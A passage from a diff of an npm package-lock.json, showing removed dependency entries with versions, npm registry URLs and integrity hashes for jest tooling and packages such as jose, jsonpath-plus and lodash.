"sha512-BPS4ynJW/o92PUR4wgriz2Ud5gpST5vz6GQfMixEDK0Z8ZCUv2M7SkBLykH56T++Xs+8ln9zTGbOvNGIe02/jw==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "@sinonjs/commons": "^1.7.0" - } - }, - "ansi-styles": { - "version": "5.2.0", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-5.2.0.tgz", - "integrity": "sha512-Cxwpt2SfTzTtXcfOlzGEee8O+c+MmUgGrNiBcXnuWxuFJHe6a5Hz7qwhwe5OgaSYI0IJvkLqWX1ASG+cJOkEiA==", - "dev": true, - "optional": true, - "peer": true - }, - "camelcase": { - "version": "6.3.0", - "resolved": "https://registry.npmjs.org/camelcase/-/camelcase-6.3.0.tgz", - "integrity": "sha512-Gmy6FhYlCY7uOElZUSbxo2UCDH8owEk996gkbrpsgGtrJLM3J7jGxl9Ic7Qwwj4ivOE5AWZWRMecDdF7hqGjFA==", - "dev": true, - "optional": true, - "peer": true - }, - "convert-source-map": { - "version": "1.9.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-1.9.0.tgz", - "integrity": "sha512-ASFBup0Mz1uyiIjANan1jzLQami9z1PoYSZCiiYW2FczPbenXc45FZdBZLzOT+r6+iciuEModtmCti+hjaAk0A==", - "dev": true, - "optional": true, - "peer": true - }, - "create-jest-runner": { - "version": "0.11.2", - "resolved": "https://registry.npmjs.org/create-jest-runner/-/create-jest-runner-0.11.2.tgz", - "integrity": "sha512-6lwspphs4M1PLKV9baBNxHQtWVBPZuDU8kAP4MyrVWa6aEpEcpi2HZeeA6WncwaqgsGNXpP0N2STS7XNM/nHKQ==", - "dev": true, - "requires": { - "chalk": "^4.1.0", - "jest-worker": "^28.0.2", - "throat": "^6.0.1" - } - }, - "diff-sequences": { - "version": "28.1.1", - "resolved": "https://registry.npmjs.org/diff-sequences/-/diff-sequences-28.1.1.tgz", - "integrity": "sha512-FU0iFaH/E23a+a718l8Qa/19bF9p06kgE0KipMOMadwa3SjnaElKzPaUC0vnibs6/B/9ni97s61mcejk8W1fQw==", - "dev": true, - "optional": true, - "peer": true - }, - "emittery": { - "version": "0.10.2", - "resolved": "https://registry.npmjs.org/emittery/-/emittery-0.10.2.tgz", - "integrity": "sha512-aITqOwnLanpHLNXZJENbOgjUBeHocD+xsSJmNrjovKBW5HbSpW3d1pEls7GFQPUWXiwG9+0P4GtHfEqC/4M0Iw==", - "dev": true, - "optional": true, - "peer": true - }, - "expect": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/expect/-/expect-28.1.3.tgz", - "integrity": "sha512-eEh0xn8HlsuOBxFgIss+2mX85VAS4Qy3OSkjV7rlBWljtA4oWH37glVGyOZSZvErDT/yBywZdPGwCXuTvSG85g==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "@jest/expect-utils": "^28.1.3", - "jest-get-type": "^28.0.2", - "jest-matcher-utils": "^28.1.3", - "jest-message-util": "^28.1.3", - "jest-util": "^28.1.3" - } - }, - "jest-diff": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-diff/-/jest-diff-28.1.3.tgz", - "integrity": "sha512-8RqP1B/OXzjjTWkqMX67iqgwBVJRgCyKD3L9nq+6ZqJMdvjE8RgHktqZ6jNrkdMT+dJuYNI3rhQpxaz7drJHfw==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "chalk": "^4.0.0", - "diff-sequences": "^28.1.1", - "jest-get-type": "^28.0.2", - "pretty-format": "^28.1.3" - } - }, - "jest-docblock": { - "version": "28.1.1", - "resolved": "https://registry.npmjs.org/jest-docblock/-/jest-docblock-28.1.1.tgz", - "integrity": "sha512-3wayBVNiOYx0cwAbl9rwm5kKFP8yHH3d/fkEaL02NPTkDojPtheGB7HZSFY4wzX+DxyrvhXz0KSCVksmCknCuA==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "detect-newline": "^3.0.0" - } - }, - "jest-environment-node": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-environment-node/-/jest-environment-node-28.1.3.tgz", - "integrity": "sha512-ugP6XOhEpjAEhGYvp5Xj989ns5cB1K6ZdjBYuS30umT4CQEETaxSiPcZ/E1kFktX4GkrcM4qu07IIlDYX1gp+A==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "@jest/environment": "^28.1.3", - "@jest/fake-timers": "^28.1.3", - "@jest/types": "^28.1.3", - "@types/node": "*", - "jest-mock": "^28.1.3", - "jest-util": "^28.1.3" - } - }, - "jest-get-type": { - "version": "28.0.2", - "resolved": "https://registry.npmjs.org/jest-get-type/-/jest-get-type-28.0.2.tgz", - "integrity": "sha512-ioj2w9/DxSYHfOm5lJKCdcAmPJzQXmbM/Url3rhlghrPvT3tt+7a/+oXc9azkKmLvoiXjtV83bEWqi+vs5nlPA==", - "dev": true, - "optional": true, - "peer": true - }, - "jest-haste-map": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-haste-map/-/jest-haste-map-28.1.3.tgz", - "integrity": "sha512-3S+RQWDXccXDKSWnkHa/dPwt+2qwA8CJzR61w3FoYCvoo3Pn8tvGcysmMF0Bj0EX5RYvAI2EIvC57OmotfdtKA==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "@jest/types": "^28.1.3", - "@types/graceful-fs": "^4.1.3", - "@types/node": "*", - "anymatch": "^3.0.3", - "fb-watchman": "^2.0.0", - "fsevents": "^2.3.2", - "graceful-fs": "^4.2.9", - "jest-regex-util": "^28.0.2", - "jest-util": "^28.1.3", - "jest-worker": "^28.1.3", - "micromatch": "^4.0.4", - "walker": "^1.0.8" - } - }, - "jest-leak-detector": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-leak-detector/-/jest-leak-detector-28.1.3.tgz", - "integrity": "sha512-WFVJhnQsiKtDEo5lG2mM0v40QWnBM+zMdHHyJs8AWZ7J0QZJS59MsyKeJHWhpBZBH32S48FOVvGyOFT1h0DlqA==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "jest-get-type": "^28.0.2", - "pretty-format": "^28.1.3" - } - }, - "jest-matcher-utils": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-matcher-utils/-/jest-matcher-utils-28.1.3.tgz", - "integrity": "sha512-kQeJ7qHemKfbzKoGjHHrRKH6atgxMk8Enkk2iPQ3XwO6oE/KYD8lMYOziCkeSB9G4adPM4nR1DE8Tf5JeWH6Bw==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "chalk": "^4.0.0", - "jest-diff": "^28.1.3", - "jest-get-type": "^28.0.2", - "pretty-format": "^28.1.3" - } - }, - "jest-message-util": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-message-util/-/jest-message-util-28.1.3.tgz", - "integrity": "sha512-PFdn9Iewbt575zKPf1286Ht9EPoJmYT7P0kY+RibeYZ2XtOr53pDLEFoTWXbd1h4JiGiWpTBC84fc8xMXQMb7g==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "@babel/code-frame": "^7.12.13", - "@jest/types": "^28.1.3", - "@types/stack-utils": "^2.0.0", - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "micromatch": "^4.0.4", - "pretty-format": "^28.1.3", - "slash": "^3.0.0", - "stack-utils": "^2.0.3" - } - }, - "jest-mock": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-mock/-/jest-mock-28.1.3.tgz", - "integrity": "sha512-o3J2jr6dMMWYVH4Lh/NKmDXdosrsJgi4AviS8oXLujcjpCMBb1FMsblDnOXKZKfSiHLxYub1eS0IHuRXsio9eA==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "@jest/types": "^28.1.3", - "@types/node": "*" - } - }, - "jest-regex-util": { - "version": "28.0.2", - "resolved": "https://registry.npmjs.org/jest-regex-util/-/jest-regex-util-28.0.2.tgz", - "integrity": "sha512-4s0IgyNIy0y9FK+cjoVYoxamT7Zeo7MhzqRGx7YDYmaQn1wucY9rotiGkBzzcMXTtjrCAP/f7f+E0F7+fxPNdw==", - "dev": true, - "optional": true, - "peer": true - }, - "jest-resolve": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-resolve/-/jest-resolve-28.1.3.tgz", - "integrity": "sha512-Z1W3tTjE6QaNI90qo/BJpfnvpxtaFTFw5CDgwpyE/Kz8U/06N1Hjf4ia9quUhCh39qIGWF1ZuxFiBiJQwSEYKQ==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^28.1.3", - "jest-pnp-resolver": "^1.2.2", - "jest-util": "^28.1.3", - "jest-validate": "^28.1.3", - "resolve": "^1.20.0", - "resolve.exports": "^1.1.0", - "slash": "^3.0.0" - } - }, - "jest-runner": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-runner/-/jest-runner-28.1.3.tgz", - "integrity": "sha512-GkMw4D/0USd62OVO0oEgjn23TM+YJa2U2Wu5zz9xsQB1MxWKDOlrnykPxnMsN0tnJllfLPinHTka61u0QhaxBA==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "@jest/console": "^28.1.3", - "@jest/environment": "^28.1.3", - "@jest/test-result": "^28.1.3", - "@jest/transform": "^28.1.3", - "@jest/types": "^28.1.3", - "@types/node": "*", - "chalk": "^4.0.0", - "emittery": "^0.10.2", - "graceful-fs": "^4.2.9", - "jest-docblock": "^28.1.1", - "jest-environment-node": "^28.1.3", - "jest-haste-map": "^28.1.3", - "jest-leak-detector": "^28.1.3", - "jest-message-util": "^28.1.3", - "jest-resolve": "^28.1.3", - "jest-runtime": "^28.1.3", - "jest-util": "^28.1.3", - "jest-watcher": "^28.1.3", - "jest-worker": "^28.1.3", - "p-limit": "^3.1.0", - "source-map-support": "0.5.13" - } - }, - "jest-runtime": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-runtime/-/jest-runtime-28.1.3.tgz", - "integrity": "sha512-NU+881ScBQQLc1JHG5eJGU7Ui3kLKrmwCPPtYsJtBykixrM2OhVQlpMmFWJjMyDfdkGgBMNjXCGB/ebzsgNGQw==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "@jest/environment": "^28.1.3", - "@jest/fake-timers": "^28.1.3", - "@jest/globals": "^28.1.3", - "@jest/source-map": "^28.1.2", - "@jest/test-result": "^28.1.3", - "@jest/transform": "^28.1.3", - "@jest/types": "^28.1.3", - "chalk": "^4.0.0", - "cjs-module-lexer": "^1.0.0", - "collect-v8-coverage": "^1.0.0", - "execa": "^5.0.0", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^28.1.3", - "jest-message-util": "^28.1.3", - "jest-mock": "^28.1.3", - "jest-regex-util": "^28.0.2", - "jest-resolve": "^28.1.3", - "jest-snapshot": "^28.1.3", - "jest-util": "^28.1.3", - "slash": "^3.0.0", - "strip-bom": "^4.0.0" - } - }, - "jest-snapshot": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-snapshot/-/jest-snapshot-28.1.3.tgz", - "integrity": "sha512-4lzMgtiNlc3DU/8lZfmqxN3AYD6GGLbl+72rdBpXvcV+whX7mDrREzkPdp2RnmfIiWBg1YbuFSkXduF2JcafJg==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "@babel/core": "^7.11.6", - "@babel/generator": "^7.7.2", - "@babel/plugin-syntax-typescript": "^7.7.2", - "@babel/traverse": "^7.7.2", - "@babel/types": "^7.3.3", - "@jest/expect-utils": "^28.1.3", - "@jest/transform": "^28.1.3", - "@jest/types": "^28.1.3", - "@types/babel__traverse": "^7.0.6", - "@types/prettier": "^2.1.5", - "babel-preset-current-node-syntax": "^1.0.0", - "chalk": "^4.0.0", - "expect": "^28.1.3", - "graceful-fs": "^4.2.9", - "jest-diff": "^28.1.3", - "jest-get-type": "^28.0.2", - "jest-haste-map": "^28.1.3", - "jest-matcher-utils": "^28.1.3", - "jest-message-util": "^28.1.3", - "jest-util": "^28.1.3", - "natural-compare": "^1.4.0", - "pretty-format": "^28.1.3", - "semver": "^7.3.5" - } - }, - "jest-util": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-util/-/jest-util-28.1.3.tgz", - "integrity": "sha512-XdqfpHwpcSRko/C35uLYFM2emRAltIIKZiJ9eAmhjsj0CqZMa0p1ib0R5fWIqGhn1a103DebTbpqIaP1qCQ6tQ==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "@jest/types": "^28.1.3", - "@types/node": "*", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "graceful-fs": "^4.2.9", - "picomatch": "^2.2.3" - } - }, - "jest-validate": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-validate/-/jest-validate-28.1.3.tgz", - "integrity": "sha512-SZbOGBWEsaTxBGCOpsRWlXlvNkvTkY0XxRfh7zYmvd8uL5Qzyg0CHAXiXKROflh801quA6+/DsT4ODDthOC/OA==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "@jest/types": "^28.1.3", - "camelcase": "^6.2.0", - "chalk": "^4.0.0", - "jest-get-type": "^28.0.2", - "leven": "^3.1.0", - "pretty-format": "^28.1.3" - } - }, - "jest-watcher": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-watcher/-/jest-watcher-28.1.3.tgz", - "integrity": "sha512-t4qcqj9hze+jviFPUN3YAtAEeFnr/azITXQEMARf5cMwKY2SMBRnCQTXLixTl20OR6mLh9KLMrgVJgJISym+1g==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "@jest/test-result": "^28.1.3", - "@jest/types": "^28.1.3", - "@types/node": "*", - "ansi-escapes": "^4.2.1", - "chalk": "^4.0.0", - "emittery": "^0.10.2", - "jest-util": "^28.1.3", - "string-length": "^4.0.1" - } - }, - "jest-worker": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-worker/-/jest-worker-28.1.3.tgz", - "integrity": "sha512-CqRA220YV/6jCo8VWvAt1KKx6eek1VIHMPeLEbpcfSfkEeWyBNppynM/o6q+Wmw+sOhos2ml34wZbSX3G13//g==", - "dev": true, - "requires": { - "@types/node": "*", - "merge-stream": "^2.0.0", - "supports-color": "^8.0.0" - } - }, - "pretty-format": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/pretty-format/-/pretty-format-28.1.3.tgz", - "integrity": "sha512-8gFb/To0OmxHR9+ZTb14Df2vNxdGCX8g1xWGUTqUw5TiZvcQf5sHKObd5UcPyLLyowNwDAMTF3XWOG1B6mxl1Q==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "@jest/schemas": "^28.1.3", - "ansi-regex": "^5.0.1", - "ansi-styles": "^5.0.0", - "react-is": "^18.0.0" - } - }, - "resolve.exports": { - "version": "1.1.1", - "resolved": "https://registry.npmjs.org/resolve.exports/-/resolve.exports-1.1.1.tgz", - "integrity": "sha512-/NtpHNDN7jWhAaQ9BvBUYZ6YTXsRBgfqWFWP7BZBaoMJO/I3G5OFzvTuWNlZC3aPjins1F+TNrLKsGbH4rfsRQ==", - "dev": true, - "optional": true, - "peer": true - }, - "supports-color": { - "version": "8.1.1", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-8.1.1.tgz", - "integrity": "sha512-MpUEN2OodtUzxvKQl72cUF7RQ5EiHsGvSsVG0ia9c5RbWGL2CI4C7EpPS8UTBIplnlzZiNuV56w+FuNxy3ty2Q==", - "dev": true, - "requires": { - "has-flag": "^4.0.0" - } - } - } - }, - "jest-runtime": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-runtime/-/jest-runtime-29.7.0.tgz", - "integrity": "sha512-gUnLjgwdGqW7B4LvOIkbKs9WGbn+QLqRQQ9juC6HndeDiezIwhDP+mhMwHWCEcfQ5RUXa6OPnFF8BJh5xegwwQ==", - "dev": true, - "requires": { - "@jest/environment": "^29.7.0", - "@jest/fake-timers": "^29.7.0", - "@jest/globals": "^29.7.0", - "@jest/source-map": "^29.6.3", - "@jest/test-result": "^29.7.0", - "@jest/transform": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/node": "*", - "chalk": "^4.0.0", - "cjs-module-lexer": "^1.0.0", - "collect-v8-coverage": "^1.0.0", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.7.0", - "jest-message-util": "^29.7.0", - "jest-mock": "^29.7.0", - "jest-regex-util": "^29.6.3", - "jest-resolve": "^29.7.0", - "jest-snapshot": "^29.7.0", - "jest-util": "^29.7.0", - "slash": "^3.0.0", - "strip-bom": "^4.0.0" - } - }, - "jest-snapshot": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-snapshot/-/jest-snapshot-29.7.0.tgz", - "integrity": "sha512-Rm0BMWtxBcioHr1/OX5YCP8Uov4riHvKPknOGs804Zg9JGZgmIBkbtlxJC/7Z4msKYVbIJtfU+tKb8xlYNfdkw==", - "dev": true, - "requires": { - "@babel/core": "^7.11.6", - "@babel/generator": "^7.7.2", - "@babel/plugin-syntax-jsx": "^7.7.2", - "@babel/plugin-syntax-typescript": "^7.7.2", - "@babel/types": "^7.3.3", - "@jest/expect-utils": "^29.7.0", - "@jest/transform": "^29.7.0", - "@jest/types": "^29.6.3", - "babel-preset-current-node-syntax": "^1.0.0", - "chalk": "^4.0.0", - "expect": "^29.7.0", - "graceful-fs": "^4.2.9", - "jest-diff": "^29.7.0", - "jest-get-type": "^29.6.3", - "jest-matcher-utils": "^29.7.0", - "jest-message-util": "^29.7.0", - "jest-util": "^29.7.0", - "natural-compare": "^1.4.0", - "pretty-format": "^29.7.0", - "semver": "^7.5.3" - } - }, - "jest-util": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-util/-/jest-util-29.7.0.tgz", - "integrity": "sha512-z6EbKajIpqGKU56y5KBUgy1dt1ihhQJgWzUlZHArA/+X2ad7Cb5iF+AK1EWVL/Bo7Rz9uurpqw6SiBCefUbCGA==", - "dev": true, - "requires": { - "@jest/types": "^29.6.3", - "@types/node": "*", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "graceful-fs": "^4.2.9", - "picomatch": "^2.2.3" - } - }, - "jest-validate": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-validate/-/jest-validate-29.7.0.tgz", - "integrity": "sha512-ZB7wHqaRGVw/9hST/OuFUReG7M8vKeq0/J2egIGLdvjHCmYqGARhzXmtgi+gVeZ5uXFF219aOc3Ls2yLg27tkw==", - "dev": true, - "requires": { - "@jest/types": "^29.6.3", - "camelcase": "^6.2.0", - "chalk": "^4.0.0", - "jest-get-type": "^29.6.3", - "leven": "^3.1.0", - "pretty-format": "^29.7.0" - }, - "dependencies": { - "camelcase": { - "version": "6.3.0", - "resolved": "https://registry.npmjs.org/camelcase/-/camelcase-6.3.0.tgz", - "integrity": "sha512-Gmy6FhYlCY7uOElZUSbxo2UCDH8owEk996gkbrpsgGtrJLM3J7jGxl9Ic7Qwwj4ivOE5AWZWRMecDdF7hqGjFA==", - "dev": true - } - } - }, - "jest-watcher": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-watcher/-/jest-watcher-29.7.0.tgz", - "integrity": "sha512-49Fg7WXkU3Vl2h6LbLtMQ/HyB6rXSIX7SqvBLQmssRBGN9I0PNvPmAmCWSOY6SOvrjhI/F7/bGAv9RtnsPA03g==", - "dev": true, - "requires": { - "@jest/test-result": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/node": "*", - "ansi-escapes": "^4.2.1", - "chalk": "^4.0.0", - "emittery": "^0.13.1", - "jest-util": "^29.7.0", - "string-length": "^4.0.1" - } - }, - "jest-worker": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-worker/-/jest-worker-29.7.0.tgz", - "integrity": "sha512-eIz2msL/EzL9UFTFFx7jBTkeZfku0yUAyZZZmJ93H2TYEiroIx2PQjEXcwYtYl8zXCxb+PAmA2hLIt/6ZEkPHw==", - "dev": true, - "requires": { - "@types/node": "*", - "jest-util": "^29.7.0", - "merge-stream": "^2.0.0", - "supports-color": "^8.0.0" - }, - "dependencies": { - "supports-color": { - "version": "8.1.1", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-8.1.1.tgz", - "integrity": "sha512-MpUEN2OodtUzxvKQl72cUF7RQ5EiHsGvSsVG0ia9c5RbWGL2CI4C7EpPS8UTBIplnlzZiNuV56w+FuNxy3ty2Q==", - "dev": true, - "requires": { - "has-flag": "^4.0.0" - } - } - } - }, - "jose": { - "version": "5.9.6", - "resolved": "https://registry.npmjs.org/jose/-/jose-5.9.6.tgz", - "integrity": "sha512-AMlnetc9+CV9asI19zHmrgS/WYsWUwCn2R7RzlbJWD7F9eWYUTGyBmU9o6PxngtLGOiDGPRu+Uc4fhKzbpteZQ==", - "optional": true - }, - "js-tokens": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/js-tokens/-/js-tokens-4.0.0.tgz", - "integrity": "sha512-RdJUflcE3cUzKiMqQgsCu06FPu9UdIJO0beYbPhHN4k6apgJtifcoCtT9bcxOpYBtpD2kCM6Sbzg4CausW/PKQ==", - "dev": true - }, - "js-yaml": { - "version": "3.14.1", - "resolved": "https://registry.npmjs.org/js-yaml/-/js-yaml-3.14.1.tgz", - "integrity": "sha512-okMH7OXXJ7YrN9Ok3/SXrnu4iX9yOk+25nqX4imS2npuvTYDmo/QEZoqwZkYaIDk3jVvBOTOIEgEhaLOynBS9g==", - "dev": true, - "requires": { - "argparse": "^1.0.7", - "esprima": "^4.0.0" - } - }, - "jsbn": { - "version": "0.1.1", - "resolved": "https://registry.npmjs.org/jsbn/-/jsbn-0.1.1.tgz", - "integrity": "sha512-UVU9dibq2JcFWxQPA6KCqj5O42VOmAY3zQUfEKxU0KpTGXwNoCjkX1e13eHNvw/xPynt6pU0rZ1htjWTNTSXsg==" - }, - "jsep": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/jsep/-/jsep-1.4.0.tgz", - "integrity": "sha512-B7qPcEVE3NVkmSJbaYxvv4cHkVW7DQsZz13pUMrfS8z8Q/BuShN+gcTXrUlPiGqM2/t/EEaI030bpxMqY8gMlw==" - }, - "jsesc": { - "version": "2.5.2", - "resolved": "https://registry.npmjs.org/jsesc/-/jsesc-2.5.2.tgz", - "integrity": "sha512-OYu7XEzjkCQ3C5Ps3QIZsQfNpqoJyZZA99wd9aWd05NCtC5pWOkShK2mkL6HXQR6/Cy2lbNdPlZBpuQHXE63gA==", - "dev": true - }, - "json-parse-even-better-errors": { - "version": "2.3.1", - "resolved": "https://registry.npmjs.org/json-parse-even-better-errors/-/json-parse-even-better-errors-2.3.1.tgz", - "integrity": "sha512-xyFwyhro/JEof6Ghe2iz2NcXoj2sloNsWr/XsERDK/oiPCfaNhl5ONfp+jQdAZRQQ0IJWNzH9zIZF7li91kh2w==", - "dev": true - }, - "json-schema": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/json-schema/-/json-schema-0.4.0.tgz", - "integrity": "sha512-es94M3nTIfsEPisRafak+HDLfHXnKBhV3vU5eqPcS3flIWqcxJWgXHXiey3YrpaNsanY5ei1VoYEbOzijuq9BA==" - }, - "json-schema-traverse": { - "version": "0.4.1", - "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-0.4.1.tgz", - "integrity": "sha512-xbbCH5dCYU5T8LcEhhuh7HJ88HXuW3qsI3Y0zOZFKfZEHcpWiHU/Jxzk629Brsab/mMiHQti9wMP+845RPe3Vg==" - }, - "json-stable-stringify-without-jsonify": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/json-stable-stringify-without-jsonify/-/json-stable-stringify-without-jsonify-1.0.1.tgz", - "integrity": "sha1-nbe1lJatPzz+8wp1FC0tkwrXJlE=", - "dev": true, - "peer": true - }, - "json-stringify-safe": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/json-stringify-safe/-/json-stringify-safe-5.0.1.tgz", - "integrity": "sha512-ZClg6AaYvamvYEE82d3Iyd3vSSIjQ+odgjaTzRuO3s7toCdFKczob2i0zCh7JE8kWn17yvAWhUVxvqGwUalsRA==" - }, - "json5": { - "version": "2.2.3", - "resolved": "https://registry.npmjs.org/json5/-/json5-2.2.3.tgz", - "integrity": "sha512-XmOWe7eyHYH14cLdVPoyg+GOH3rYX++KpzrylJwSW98t3Nk+U8XOl8FWKOgwtzdb8lXGf6zYwDUzeHMWfxasyg==", - "dev": true - }, - "jsonpath-plus": { - "version": "10.2.0", - "resolved": "https://registry.npmjs.org/jsonpath-plus/-/jsonpath-plus-10.2.0.tgz", - "integrity": "sha512-T9V+8iNYKFL2n2rF+w02LBOT2JjDnTjioaNFrxRy0Bv1y/hNsqR/EBK7Ojy2ythRHwmz2cRIls+9JitQGZC/sw==", - "requires": { - "@jsep-plugin/assignment": "^1.3.0", - "@jsep-plugin/regex": "^1.0.4", - "jsep": "^1.4.0" - } - }, - "jsprim": { - "version": "1.4.2", - "resolved": "https://registry.npmjs.org/jsprim/-/jsprim-1.4.2.tgz", - "integrity": "sha512-P2bSOMAc/ciLz6DzgjVlGJP9+BrJWu5UDGK70C2iweC5QBIeFf0ZXRvGjEj2uYgrY2MkAAhsSWHDWlFtEroZWw==", - "requires": { - "assert-plus": "1.0.0", - "extsprintf": "1.3.0", - "json-schema": "0.4.0", - "verror": "1.10.0" - } - }, - "kleur": { - "version": "3.0.3", - "resolved": "https://registry.npmjs.org/kleur/-/kleur-3.0.3.tgz", - "integrity": "sha512-eTIzlVOSUR+JxdDFepEYcBMtZ9Qqdef+rnzWdRZuMbOywu5tO2w2N7rqjoANZ5k9vywhL6Br1VRjUIgTQx4E8w==", - "dev": true - }, - "leven": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/leven/-/leven-3.1.0.tgz", - "integrity": "sha512-qsda+H8jTaUaN/x5vzW2rzc+8Rw4TAQ/4KjB46IwK5VH+IlVeeeje/EoZRpiXvIqjFgK84QffqPztGI3VBLG1A==", - "dev": true - }, - "levn": { - "version": "0.4.1", - "resolved": "https://registry.npmjs.org/levn/-/levn-0.4.1.tgz", - "integrity": "sha512-+bT2uH4E5LGE7h/n3evcS/sQlJXCpIp6ym8OWJ5eV6+67Dsql/LaaT7qJBAt2rzfoa/5QBGBhxDix1dMt2kQKQ==", - "dev": true, - "peer": true, - "requires": { - "prelude-ls": "^1.2.1", - "type-check": "~0.4.0" - } - }, - "lines-and-columns": { - "version": "1.1.6", - "resolved": "https://registry.npmjs.org/lines-and-columns/-/lines-and-columns-1.1.6.tgz", - "integrity": "sha1-HADHQ7QzzQpOgHWPe2SldEDZ/wA=", - "dev": true - }, - "locate-path": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/locate-path/-/locate-path-5.0.0.tgz", - "integrity": "sha512-t7hw9pI+WvuwNJXwk5zVHpyhIqzg2qTlklJOf0mVxGSbe3Fp2VieZcduNYjaLDoy6p9uGpQEGWG87WpMKlNq8g==", - "dev": true, - "requires": { - "p-locate": "^4.1.0" - } - }, - "lodash.clonedeep": { - "version": "4.5.0", - "resolved": "https://registry.npmjs.org/lodash.clonedeep/-/lodash.clonedeep-4.5.0.tgz", - "integrity": "sha1-4j8/nE+Pvd6HJSnBBxhXoIblzO8=", - "dev": true, - "peer": true - }, - "lodash.memoize": { - "version": "4.1.2", - "resolved": "https://registry.npmjs.org/lodash.memoize/-/lodash.memoize-4.1.2.tgz", - "integrity": "sha512-t7j+NzmgnQzTAYXcsHYLgimltOV1MXHtlOWf6GjL9Kj8GK5FInw5JotxvbOs+IvV1/Dzo04/fCGfLVs7aXb4Ag==", - "dev": true - }, - "lodash.merge": { - "version": "4.6.2", - "resolved": "https://registry.npmjs.org/lodash.merge/-/lodash.merge-4.6.2.tgz", - "integrity": "sha512-0KpjqXRVvrYyCsX1swR/XTK0va6VQkQM6MNo7PqW77ByjAhoARA8EfrP1N4+KlKj8YS0ZUCtRT/YUuhyYDujIQ==", - "dev": true, - "peer": true - }, - "lodash.truncate": { - "version": "4.4.2", - "resolved": "https://registry.npmjs.org/lodash.truncate/-/lodash.truncate-4.4.2.tgz", - "integrity": "sha1-WjUNoLERO4N+z//VgSy+WNbq4ZM=", - "dev": true, - "peer": true - }, - "make-dir": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/make-dir/-/make-dir-4.0.0.tgz", - "integrity": "sha512-hXdUTZYIVOt1Ex//jAQi+wTZZpUpwBj/0QsOzqegb3rGMMeJiSEu5xLHnYfBrRV4RH2+OCSOO95Is/7x1WJ4bw==", - "dev": true, - "requires": { - "semver": "^7.5.3" - } - }, - "make-error": { - "version": "1.3.6", - "resolved": "https://registry.npmjs.org/make-error/-/make-error-1.3.6.tgz", - "integrity": "sha512-s8UhlNe7vPKomQhC1qFelMokr/Sc3AgNbso3n74mVPA5LTZwkB9NlXf4XPamLxJE8h0gh73rM94xvwRT2CVInw==", - "dev": true - }, - "makeerror": { - "version": "1.0.12", - "resolved": "https://registry.npmjs.org/makeerror/-/makeerror-1.0.12.tgz", - "integrity": "sha512-JmqCvUhmt43madlpFzG4BQzG2Z3m6tvQDNKdClZnO3VbIudJYmxsT0FNJMeiB2+JTSlTQTSbU8QdesVmwJcmLg==", - "dev": true, - "requires": { - "tmpl": "1.0.5" - } - }, - "merge-stream": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/merge-stream/-/merge-stream-2.0.0.tgz", - "integrity": "sha512-abv/qOcuPfk3URPfDzmZU1LKmuw8kT+0nIHvKrKgFrwifol/doWcdA4ZqsWQ8ENrFKkd67Mfpo/LovbIUsbt3w==", - "dev": true - }, - "micromatch": { - "version": "4.0.8", - "resolved": 